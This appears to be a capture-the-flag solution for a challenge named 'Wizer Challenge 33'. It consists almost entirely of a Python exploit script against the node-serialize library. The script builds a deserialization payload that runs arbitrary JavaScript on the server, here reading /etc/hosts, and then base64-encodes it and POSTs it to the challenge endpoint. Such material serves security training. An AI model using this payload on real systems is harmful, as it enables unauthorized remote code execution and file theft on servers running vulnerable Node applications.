Wizer - Challenge 33 - node-serialize RCE

Exploit

import requests
import base64
import json

url = "https://chal33-dfj895.vercel.app/getMyName"

payload = {
  "name": "_$$ND_FUNC$$_function (){ return require('fs').readFileSync('/etc/hosts', 'utf8'); }()"
}



data = {
    "profile": base64.b64encode(json.dumps(payload).encode('ascii')).decode('ascii')
}

print(data)

r = requests.post(url, json=data)

print(r.text)